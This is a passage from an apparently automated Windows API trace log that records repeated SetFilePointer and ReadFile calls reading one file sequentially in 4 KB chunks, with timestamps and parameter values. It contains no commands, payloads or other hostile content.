lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.367] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x2e000 [0113.367] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.369] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x2f000 [0113.369] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.369] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x30000 [0113.369] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.370] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x31000 [0113.370] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.370] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x32000 [0113.370] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.371] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x33000 [0113.371] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.371] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x34000 [0113.371] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.371] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x35000 [0113.372] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.372] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x36000 [0113.372] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.372] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x37000 [0113.372] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.373] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x38000 [0113.373] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.373] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x39000 [0113.373] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.374] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x3a000 [0113.374] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.374] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x3b000 [0113.374] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.374] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x3c000 [0113.374] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.375] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x3d000 [0113.375] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.375] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x3e000 [0113.375] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.375] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x3f000 [0113.375] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.376] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x40000 [0113.376] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.376] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x41000 [0113.376] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.376] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x42000 [0113.377] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.377] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x43000 [0113.377] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.377] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x44000 [0113.377] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.378] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x45000 [0113.378] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.378] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x46000 [0113.378] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.378] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x47000 [0113.378] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.379] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x48000 [0113.379] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.379] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x49000 [0113.379] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.379] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x4a000 [0113.380] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.380] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x4b000 [0113.380] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.380] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x4c000 [0113.380] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.381] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x4d000 [0113.381] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.381] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x4e000 [0113.381] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.392] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x4f000 [0113.392] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.392] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x50000 [0113.392] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.392] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x51000 [0113.392] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.393] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x52000 [0113.393] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.393] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x53000 [0113.393] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.393] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x54000 [0113.393] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.394] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x55000 [0113.394] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.394] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x56000 [0113.394] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.394] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x57000 [0113.394] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.395] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x58000 [0113.395] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.395] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x59000 [0113.395] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.395] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x5a000 [0113.395] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.395] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x5b000 [0113.396] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.396] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x5c000 [0113.396] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.396] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x5d000 [0113.396] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.396] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x5e000 [0113.396] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.397] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x5f000 [0113.397] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.397] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x60000 [0113.397] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.397] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x61000 [0113.397] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.398] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x62000 [0113.398] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.398] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x63000 [0113.398] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.398] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x64000 [0113.398] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.398] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x65000 [0113.398] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.399] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x66000 [0113.399] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, lpNumberOfBytesRead=0x5a0d554*=0x1000, lpOverlapped=0x0) returned 1 [0113.399] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d528*=0) returned 0x67000 [0113.399] ReadFile (in: hFile=0x408, lpBuffer=0x240ef24, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d554, lpOverlapped=0x0 | out: lpBuffer=0x240ef24*, 